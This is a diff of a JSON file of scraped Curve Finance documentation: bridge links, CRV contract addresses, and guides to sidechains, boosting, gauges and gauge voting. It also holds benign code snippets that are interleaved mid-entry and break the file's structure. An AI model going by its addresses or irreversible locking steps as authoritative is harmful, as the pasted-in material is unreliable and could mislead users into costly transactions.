Network | Bridge | CRV Contract Address: Arbitrum | https://bridge.arbitrum.io/ | 0x11cDb42B0EB46D95f990BeDD4695A6e3fA034978; Base | https://bridge.base.org/deposit | 0x8Ee73c484A26e0A5df2Ee2a4960B789967dd0415; Optimism | https://app.optimism.io/bridge | 0x0994206dfE8De6Ec6920FF4D779B0d950605Fb53; Polygon | https://wallet.polygon.technology/bridge/ | 0x172370d5Cd63279eFa6d502DAB29171933a610AF; xDai | xDai Bridge: https://bridge.xdaichain.com/ | 0x712b3d230F3C1c19db860d80619288b1F0BDd0Bd; xDai | Omni Bridge: https://omni.xdaichain.com/bridge | 0x712b3d230F3C1c19db860d80619288b1F0BDd0Bd; Avalanche | Multichain: https://multichain.org/ | 0x47536F17F4fF30e64A96a7555826b8f9e66ec468; Fantom | Multichain: https://multichain.org/ | 0x1E4F97b9f9F913c46F1632781732927B9019C68b; Celo | Multichain: https://multichain.org/ | 0x173fd7434B8B50dF08e3298f173487ebDB35FD14 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Understanding multichain", + "title": "Understanding multi-chain", "html_url": "https://resources.curve.fi/multichain/understanding-multichain/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Understanding multichain Table of contents Understanding Multichain Connecting your Wallet Curve Forks Avalanche Arbitrum Binance Smart Chain Fantom Harmony Optimis Polygon xDai Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Understanding Multichain Connecting your Wallet Curve Forks Avalanche Arbitrum Binance Smart Chain Fantom Harmony Optimis Polygon xDai Understanding multichain Understanding Multichain Curve exists across several chains, with several more planned. Curve's primary chain will always be Ethereum, but other sidechains have advantages including speed and cost. In order to use Curve on other chains, you must typically send your funds from Ethereum to the sidechain using the chain's bridge. All of Curve's active chains can be found in the \"Networks\" menu on the Curve homepage. Supported Sidechains as of 11/14/2022 Connecting your Wallet When you move to new chains, you will need to connect your wallet with the chain's RPC and chain ID. Generally Curve sidechain pages have a button you can press to automatically switch networks and populate this information for you. 
A common issue with sidechains is RPC networks that are temporarily or permanently unavailable. If you are having trouble connecting with RPC networks you may need to visit the chain's support networks to find a new RPC network. Curve Forks Curve forks include the following: Avalanche Avalanche is a sidechain that bills itself as \"blazingly fast, low-cost and eco-friendly.\" Curve's Avalanche site is hosted at https://avax.curve.fi/ Arbitrum Arbitrum is an Optimistic Ethereum L2. Arbitrum validators optimistically assume nodes will be operating in good faith, which allows for faster transactions. However, to retroactively allow opportunity to challenge malicious behavior, settlement time can be slower. In some cases this could mean it takes up to one week to bridge funds off-chain, so plan accordingly. Useful Links: Curve: https://arbitrum.curve.fi/ Bridge: https://bridge.arbitrum.io/ Block Explorer: https://arbiscan.io/ Binance Smart Chain Curve does not operate on Binance Smart Chain. The team at Ellipsis ( https://ellipsis.finance/ ) launched a fork of Curve that provides similar functionality. The Curve team authorized this fork, but does not actively maintain this fund. Fantom Using Curve on Fantom Harmony Harmony is a proof-of-stake sidechain promising two seconds of transaction speed and a hundred times lower gas fee. Curve's Harmony offerings are at https://harmony.curve.fi/ Optimis Optimism is verified by a series of smart contracts on the Ethereum mainnet and thus not considered a real sidechain. Curve's Optimism branch is located at https://optimism.curve.fi/ Polygon Using Curve on Polygon xDai The xDai chain is a stable payments EVM (Ethereum Virtual Machine) blockchain designed for fast and inexpensive transactions. Useful Links: Curve : https://xdai.curve.fi/ Bridges: xDai Bridge: https://bridge.xdaichain.com/ Omni Bridge: https://omni.xdaichain.com/bridge Block Explorer: https://blockscout.com/xdai/mainnet/ Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Understanding multi-chain Table of contents Connecting your Wallet Curve Forks Avalanche Arbitrum Binance Smart Chain Fantom Harmony Optimism Polygon xDai/Gnosis Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github 
Governance Forum Twitter Technical Docs Table of contents Connecting your Wallet Curve Forks Avalanche Arbitrum Binance Smart Chain Fantom Harmony Optimism Polygon xDai/Gnosis Home Multi-Chain Understanding multi-chain Curve exists across several chains, with several more planned. Curve's primary chain will always be Ethereum, but other sidechains have advantages including speed and cost. In order to use Curve on other chains, you must typically send your funds from Ethereum to the sidechain using the chain's bridge. All of Curve's active chains can be found in the \"Networks\" menu on the Curve homepage. Supported Sidechains as of 11/14/2022 Connecting your Wallet When you move to new chains, you will need to connect your wallet with the chain's RPC and chain ID. Generally Curve sidechain pages have a button you can press to automatically switch networks and populate this information for you. A common issue with sidechains is RPC networks that are temporarily or permanently unavailable. If you are having trouble connecting with RPC networks you may need to visit the chain's support networks to find a new RPC network. Curve Forks Tip For Bridges and CRV contract addresses on other chains, please see Important Bridges. Curve forks include the following: Avalanche Avalanche is a sidechain that bills itself as \"blazingly fast, low-cost and eco-friendly.\" Curve's Avalanche site is hosted at https://avax.curve.fi/ Arbitrum Arbitrum is an Optimistic Ethereum L2. Arbitrum validators optimistically assume nodes will be operating in good faith, which allows for faster transactions. However, to retroactively allow opportunity to challenge malicious behavior, settlement time can be slower. In some cases this could mean it takes up to one week to bridge funds off-chain, so plan accordingly. Curve on Arbitrum: https://curve.fi/#/arbitrum/pools Binance Smart Chain Curve does not operate on Binance Smart Chain. The team at Ellipsis ( https://ellipsis.finance/ ) launched a fork of Curve that provides similar functionality. The Curve team authorized this fork, but does not actively maintain it. Fantom Fantom is a high-performance, scalable, and secure smart contract platform designed to overcome the limitations of traditional blockchain networks by utilizing a DAG-based consensus algorithm. Curve on Fantom: https://curve.fi/#/fantom/pools Harmony Harmony is a proof-of-stake sidechain promising two seconds of transaction speed and a hundred times lower gas fee. Curve's Harmony offerings are at https://harmony.curve.fi/ . Optimism Optimism is verified by a series of smart contracts on the Ethereum mainnet and thus not considered a real sidechain. Curve's Optimism branch is located at https://curve.fi/#/optimism/pools Polygon Polygon (previously known as Matic Network) is a multi-chain scaling solution for Ethereum that aims to provide faster and cheaper transactions using Layer 2 sidechains. Curve on Polygon: https://curve.fi/#/polygon/pools xDai/Gnosis The xDai chain is a stable payments EVM (Ethereum Virtual Machine) blockchain designed for fast and inexpensive transactions. 
Curve on xDai/Gnosis: https://curve.fi/#/xdai/pools 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -2122,7 +2146,7 @@ { "title": "Using curve on fantom", "html_url": "https://resources.curve.fi/multichain/using-curve-on-fantom/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on fantom Table of contents Using Curve on Fantom Changing your MetaMask network Acquiring FTM Head to Curve Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Using Curve on Fantom Changing your MetaMask network Acquiring FTM Head to Curve Using curve on fantom Using Curve on Fantom Changing your MetaMask network Fantom is an EVM-compatible chain meaning it can easily run with MetaMask. The first step of this tutorial is to set up a different the Fantom network on Metamask. Click on Settings and Networks and add. Fill details as below: RPC: https://rpcapi.fantom.network Chain Id: 250 Symbol: FTM Explorer: https://ftmscan.com Acquiring FTM Now that you're set up in MetaMask, you can browse any Fantom dapps with ease. Each account on Ethereum also exists on Fantom which means you can use the same addresses without issues on Ethereum and Fantom. Please note Fantom does not yet support MetaMask via Ledger. To get started you'll need to get Fantom native currency FTM, you can acquire it on SushiSwap or most centralised exchanges. For the latter, you can transfer directly to your Fantom address via the Fantom blockchain. If you purchase FTM on the Ethereum blockchain, you can cross to Fantom using bridges. This will let you transfer FTM from Ethereum to Fantom and start transacting. 
Head to Curve Once that's done you can also bridge USDC/DAI and deposit and swap on Curve Fantom website making sure you're connected to the Fantom network in your MetaMask settings: Curve.fi Experience Curve like it's January 2020 Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Using Curve on Fantom Changing your MetaMask network Acquiring FTM Head to Curve Using curve on fantom Using Curve on Fantom Changing your MetaMask network Fantom is an EVM-compatible chain meaning it can easily run with MetaMask. The first step of this tutorial is to set up the Fantom network on MetaMask. Click on Settings, then Networks, and add a network. Fill in the details as below: RPC: https://rpcapi.fantom.network Chain Id: 250 Symbol: FTM Explorer: https://ftmscan.com Acquiring FTM Now that you're set up in MetaMask, you can browse any Fantom dapps with ease. Each account on Ethereum also exists on Fantom which means you can use the same addresses without issues on Ethereum and Fantom. Please note Fantom does not yet support MetaMask via Ledger. To get started you'll need Fantom's native currency, FTM; you can acquire it on SushiSwap or most centralised exchanges. For the latter, you can transfer directly to your Fantom address via the Fantom blockchain. If you purchase FTM on the Ethereum blockchain, you can cross to Fantom using bridges. This will let you transfer FTM from Ethereum to Fantom and start transacting. 
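Adding a network programmatically is an EIP-3085 wallet_addEthereumChain request, which is what the "switch network" buttons on Curve sidechain pages do under the hood. A minimal browser-side sketch using the details listed above:

```ts
// Browser context: MetaMask injects `window.ethereum` (EIP-1193).
async function addFantomNetwork() {
  await (window as any).ethereum.request({
    method: "wallet_addEthereumChain", // EIP-3085
    params: [{
      chainId: "0xfa", // 250 in hex
      chainName: "Fantom Opera",
      nativeCurrency: { name: "Fantom", symbol: "FTM", decimals: 18 },
      rpcUrls: ["https://rpcapi.fantom.network"],
      blockExplorerUrls: ["https://ftmscan.com"],
    }],
  });
}
```

MetaMask prompts the user to approve the new network, then offers to switch to it.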
Head to Curve Once that's done you can also bridge USDC/DAI and deposit and swap on Curve Fantom website making sure you're connected to the Fantom network in your MetaMask settings: Curve.fi Experience Curve like it's January 2020 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -2130,15 +2154,15 @@ { "title": "Using curve on polygon", "html_url": "https://resources.curve.fi/multichain/using-curve-on-polygon/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Using curve on polygon Table of contents Using Curve on Polygon Changing your MetaMask network Acquiring Matic to pay for transaction fees Head to Curve Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Using Curve on Polygon Changing your MetaMask network Acquiring Matic to pay for transaction fees Head to Curve Using curve on polygon Using Curve on Polygon Changing your MetaMask network Upon visiting https://polygon.curve.fi/ , you will be prompted to change your network on Metamask: Acquiring Matic to pay for transaction fees Transaction fees on Matic are very cheap usually costing less than $0.0001 but you'll still need Matic to pay for gas. 
You can bridge some from Ethereum using the link below: Polygon Head to Curve Once that's done you can also bridge USDC/DAI and deposit and swap on Curve Polygon website making sure you're connected to the Polygon network in your MetaMask settings: Curve.fi If you haven't used Curve below you can check out the tutorial below: Depositing Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Using Curve on Polygon Changing your MetaMask network Acquiring Matic to pay for transaction fees Head to Curve Using curve on polygon Using Curve on Polygon Changing your MetaMask network Upon visiting https://polygon.curve.fi/ , you will be prompted to change your network on Metamask: Acquiring Matic to pay for transaction fees Transaction fees on Matic are very cheap, usually costing less than $0.0001, but you'll still need Matic to pay for gas. 
You can bridge some from Ethereum using the link below: Polygon Head to Curve Once that's done you can also bridge USDC/DAI and deposit and swap on Curve Polygon website making sure you're connected to the Polygon network in your MetaMask settings: Curve.fi If you haven't used Curve before, you can check out the tutorial below: Depositing 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Boosting your crv rewards", + "title": "Boosting your CRV rewards", "html_url": "https://resources.curve.fi/reward-gauges/boosting-your-crv-rewards/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Boosting your crv rewards Table of contents Boosting your CRV Rewards Figuring out your required boost Locking your CRV Applying your boost Formula FAQ Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Boosting your CRV Rewards Figuring out your required boost Locking your CRV Applying your boost Formula FAQ Boosting your crv rewards Boosting your CRV Rewards This guide is assuming you have already provided liquidity and that you are currently staking your LP tokens on the DAO gauge. One of the main incentive for CRV is the ability to boost your rewards on provided liquidity. Vote locking CRV allows you to acquire voting power to participate in the DAO and earn a boost of up to 2.5x on the liquidity you are providing on Curve. Click below if you have questions about how the vote locking boost works: Vote Locking Boosting your rewards video guide: https://www.youtube.com/watch?v=blZTCWu-DQg Figuring out your required boost The first step to getting your rewards boosted is to figure out how much CRV you'll need to lock. All gauges have different requirements meaning some pools are easier to boost than others. It depends on how much others have locked and how much the liquidity gauge has. You can find the calculator at this address: https://dao.curve.fi/minter/calc Locking your CRV Once you know how much and how long you wish to lock for, visit the following page: https://dao.curve.fi/locker Enter the amount you want to lock and select your expiry. Remember locking is not reversible. The amount of veCRV received will depend on how much and how long you vote for. 
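Programmatically, the lock described here is a single call to the VotingEscrow contract's create_lock(amount, unlock_time) after approving CRV. A sketch with placeholder addresses; note the contract rounds the unlock time down to a whole week, and the lock cannot be reversed before expiry:

```ts
import { ethers } from "ethers";

const CRV = "0x...";           // placeholder -- the CRV token
const VOTING_ESCROW = "0x..."; // placeholder -- the veCRV (VotingEscrow) contract

const erc20Abi = ["function approve(address spender, uint256 amount) returns (bool)"];
const escrowAbi = ["function create_lock(uint256 value, uint256 unlockTime)"];

// Lock `amount` CRV for roughly `weeks` weeks. The escrow pulls CRV via
// transferFrom, so an approval must come first.
async function lockCrv(signer: ethers.Signer, amount: bigint, weeks: number) {
  const crv = new ethers.Contract(CRV, erc20Abi, signer);
  const escrow = new ethers.Contract(VOTING_ESCROW, escrowAbi, signer);
  const unlockTime = Math.floor(Date.now() / 1000) + weeks * 7 * 24 * 3600;
  await (await crv.approve(VOTING_ESCROW, amount)).wait();
  await (await escrow.create_lock(amount, unlockTime)).wait();
}
```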
You can extend a lock and add CRV to it at any point, but you cannot have CRV locks with different expiry dates. After creating your lock, you will need to apply your boost. Applying your boost Head over to the minter page: https://dao.curve.fi/minter/gauges If you see your new boost after Current boost: then you do not need to do anything else. If your current boost hasn't moved, you will need to claim CRV from each of the gauges you're providing liquidity in to update your boost. After doing so, your boost should be showing. Your boost will not be updated until you withdraw, deposit or claim from a liquidity gauge. Formula The boost mechanism calculates your earning weight by taking the smaller of two values. The first value is simple: it's the amount of liquidity you are providing, which in this example is $10,000. This amount is your maximum earning weight. FAQ Vote Locking Last update: 2023-08-15", + "body": "Boosting your CRV rewards This guide assumes you have already provided liquidity and that you are currently staking your LP tokens on the DAO gauge. One of the main incentives for CRV is the ability to boost your rewards on provided liquidity. Vote locking CRV allows you to acquire voting power to participate in the DAO and earn a boost of up to 2.5x on the liquidity you are providing on Curve. Click below if you have questions about how the vote locking boost works: Vote Locking Boosting your rewards video guide: https://www.youtube.com/watch?v=blZTCWu-DQg Figuring out your required boost The first step to getting your rewards boosted is to figure out how much CRV you'll need to lock. All gauges have different requirements, meaning some pools are easier to boost than others. It depends on how much others have locked and how much liquidity the gauge holds.
You can find the calculator at this address: https://dao.curve.fi/minter/calc Locking your CRV Once you know how much and how long you wish to lock for, visit the following page: https://dao.curve.fi/locker Enter the amount you want to lock and select your expiry. Remember, locking is not reversible. The amount of veCRV received will depend on how much and how long you lock for. You can extend a lock and add CRV to it at any point, but you cannot have CRV locks with different expiry dates. After creating your lock, you will need to apply your boost. Applying your boost Head over to the minter page: https://dao.curve.fi/minter/gauges If you see your new boost after Current boost: then you do not need to do anything else. If your current boost hasn't moved, you will need to claim CRV from each of the gauges you're providing liquidity in to update your boost. After doing so, your boost should be showing. Your boost will not be updated until you withdraw, deposit or claim from a liquidity gauge. Boost Info The list of pools and boost/reward info has moved away from the minter page. You can now find all this information on each pool page on the classic.curve.fi site. Alternatively, this information can also be found in the new UI ( curve.fi ) under the \"Your Details\" section on the pool page. Be aware: the new UI does not display future boost yet. Head to the old or new dashboard to see all your pools! Formula The boost mechanism calculates your earning weight by taking the smaller of two values (a sketch of the calculation follows this entry). The first value is simple: it's the amount of liquidity you are providing, which in this example is $10,000. This amount is your maximum earning weight. FAQ Vote Locking 2023-09-28", "labels": [ "Documentation" ] },
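The entry above says earning weight is the smaller of two values, capped at a 2.5x boost. Here is a minimal plain-Python sketch of that rule, mirroring the publicly documented veCRV boost formula (40% of the deposit counts unconditionally, up to another 60% unlocks in proportion to your veCRV share); treat it as illustrative, not as the exact on-chain implementation, and all numbers in the example are assumptions.

def working_balance(deposit: float, gauge_total: float,
                    user_vecrv: float, total_vecrv: float) -> float:
    # 40% of your deposit always earns; up to another 60% is unlocked in
    # proportion to your share of total veCRV.
    limit = 0.4 * deposit + 0.6 * gauge_total * (user_vecrv / total_vecrv)
    return min(deposit, limit)  # capped at your full deposit (max earning weight)

def boost(deposit: float, gauge_total: float,
          user_vecrv: float, total_vecrv: float) -> float:
    # Ratio versus the unboosted (0.4x) baseline; ranges from 1.0 to 2.5.
    return working_balance(deposit, gauge_total, user_vecrv, total_vecrv) / (0.4 * deposit)

# Example: $10,000 provided in a gauge holding $1,000,000, owning 1% of all veCRV.
print(boost(10_000, 1_000_000, 10_000, 1_000_000))  # -> 2.5 (fully boosted)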
@@ -2146,7 +2170,7 @@ { "title": "Creating a pool gauge", "html_url": "https://resources.curve.fi/reward-gauges/creating-a-pool-gauge/", - "body": "Creating a Pool Gauge Deploy a Gauge You can deploy the gauge directly through the UI simply by posting the pool address: https://classic.curve.fi/factory/create_gauge Submit a DAO Vote Once you've created your gauge, you need to submit it to the DAO for a vote. https://classic.curve.fi/factory/create_vote The address that submits must have 2500 veCRV in order to create a vote. Once the gauge has been submitted, politics take over. You may want to visit the governance forum and explain why your pool should be made eligible for rewards. Governance Forum Last update: 2023-08-15", + "body": "Creating a pool gauge Deploy a Gauge You can deploy the gauge directly through the UI simply by posting the pool address: https://classic.curve.fi/factory/create_gauge Deploy a Gauge via Etherscan In addition to the UI, there is an option to deploy the gauge directly through Etherscan (see the sketch after this entry). Warning Calling deploy_gauge on Etherscan will only work if the function is called on the Factory contract that also deployed the pool. To navigate to this page, first search for the corresponding Factory contract on Etherscan. Then go to Contract -> Write Contract -> deploy_gauge , insert the pool address you want to add a gauge for, press Write and sign the transaction. Before deploying the gauge, ensure you connect your wallet by clicking the Connect to Web3 button. Submit a DAO Vote Once you've created your gauge, you need to submit it to the DAO for a vote. https://classic.curve.fi/factory/create_vote The address that submits must have 2500 veCRV in order to create a vote. Once the gauge has been submitted, politics take over. You may want to visit the governance forum and explain why your pool should be made eligible for rewards. Governance Forum 2023-10-01", "labels": [ "Documentation" ] },
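For readers who prefer scripting over Etherscan's Write Contract tab, here is a minimal web3.py (v6) sketch of the same deploy_gauge call. The RPC endpoint, factory/pool/account addresses and the single-argument ABI fragment are assumptions; deploy_gauge signatures differ between factory versions, so check the verified Factory contract on Etherscan first.

from web3 import Web3

w3 = Web3(Web3.HTTPProvider("https://eth.llamarpc.com"))  # assumed RPC endpoint
FACTORY = "0x..."  # placeholder: the Factory contract that also deployed the pool
POOL = "0x..."     # placeholder: pool to add a gauge for
ACCOUNT = "0x..."  # placeholder: your address

# Assumed minimal ABI fragment for a one-argument deploy_gauge(_pool).
factory = w3.eth.contract(address=FACTORY, abi=[{
    "name": "deploy_gauge", "type": "function", "stateMutability": "nonpayable",
    "inputs": [{"name": "_pool", "type": "address"}],
    "outputs": [{"name": "", "type": "address"}],
}])

tx = factory.functions.deploy_gauge(POOL).build_transaction({
    "from": ACCOUNT, "nonce": w3.eth.get_transaction_count(ACCOUNT),
})
# Then sign with your key and broadcast:
# signed = w3.eth.account.sign_transaction(tx, private_key=...)
# w3.eth.send_raw_transaction(signed.rawTransaction)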
@@ -2154,7 +2178,15 @@ { "title": "Gauge weights", "html_url": "https://resources.curve.fi/reward-gauges/gauge-weights/", - "body": "Gauge Weights What are gauge weights? Simply put, a gauge weight translates into how much of the daily CRV inflation it receives. For example, on the chart below, the Y pool is currently receiving around 72% of the daily CRV inflation. This means that all liquidity providers in the Y pool share 72% of the daily CRV. You can find each liquidity gauge's relative weight on this page: https://dao.curve.fi/minter/gauges Why are gauge weights so important? Because those weights decide where the CRV inflation goes, they allow the DAO to control where most of the liquidity should go and to balance liquidity. It's a powerful tool for voters that must be used responsibly. Gauge weights are updated once a week on Thursdays. Who can vote for gauge weights? Anybody who has vote locked CRV can vote to direct their voting power towards one or multiple Curve pools. How can I vote? Visit this link: https://dao.curve.fi/gaugeweight Select the gauge you would like to put your voting weight towards, enter an amount in BPS (10,000 = 100%, the maximum) and confirm your transaction. How often can I move my voting weight? You can change your voting weight once every 10 days.
Last update: 2023-08-15", + "body": "What are gauge weights? Simply put, a gauge weight translates into how much of the daily CRV inflation it receives. For example, on the chart below, the Y pool is currently receiving around 72% of the daily CRV inflation. This means that all liquidity providers in the Y pool share 72% of the daily CRV. You can find each liquidity gauge's relative weight on this page: https://dao.curve.fi/minter/gauges Why are gauge weights so important? Because those weights decide where the CRV inflation goes, they allow the DAO to control where most of the liquidity should go and to balance liquidity. It's a powerful tool for voters that must be used responsibly. Gauge weights are updated once a week on Thursdays. Who can vote for gauge weights? Anybody who has vote locked CRV can vote to direct their voting power towards one or multiple Curve pools. How can I vote? Visit this link: https://dao.curve.fi/gaugeweight Select the gauge you would like to put your voting weight towards, enter an amount in BPS (10,000 = 100%, the maximum) and confirm your transaction (see the sketch after this entry). How often can I move my voting weight? You can change your voting weight once every 10 days. What happens when I add additional CRV to my existing lock or extend the locktime? Adding more $CRV to your lock or extending the locktime increases your veCRV balance. This increase is not automatically accounted for in your current gauge weight votes. If you want to allocate all of your newly acquired voting power, make sure to re-vote. Warning Resetting your gauge weight before re-voting means you'll need to wait 10 days to vote for the gauges whose weight you've reset. So please simply re-vote; there is no need to reset your gauge weight votes before voting again. 2023-10-09", + "labels": [ + "Documentation" + ] + },
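The gauge weight vote described above can also be cast programmatically. Below is a minimal web3.py (v6) sketch using the BPS convention from the entry (10,000 = 100%). The RPC endpoint, gauge and account addresses are placeholders, and the GaugeController address shown is the commonly cited Curve mainnet deployment; verify it independently before use.

from web3 import Web3

w3 = Web3(Web3.HTTPProvider("https://eth.llamarpc.com"))  # assumed RPC endpoint
GAUGE_CONTROLLER = "0x2F50D538606Fa9EDD2B11E2446BEb18C9D5846bB"  # verify before use
GAUGE = "0x..."    # placeholder: gauge to vote for
ACCOUNT = "0x..."  # placeholder: your (veCRV-holding) address

controller = w3.eth.contract(address=GAUGE_CONTROLLER, abi=[{
    "name": "vote_for_gauge_weights", "type": "function",
    "stateMutability": "nonpayable",
    "inputs": [{"name": "_gauge_addr", "type": "address"},
               {"name": "_user_weight", "type": "uint256"}],
    "outputs": [],
}])

# Put 25% (2,500 BPS) of your veCRV voting power on one gauge; the same call
# with an updated weight is how you re-vote after increasing your lock.
tx = controller.functions.vote_for_gauge_weights(GAUGE, 2500).build_transaction({
    "from": ACCOUNT, "nonce": w3.eth.get_transaction_count(ACCOUNT),
})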
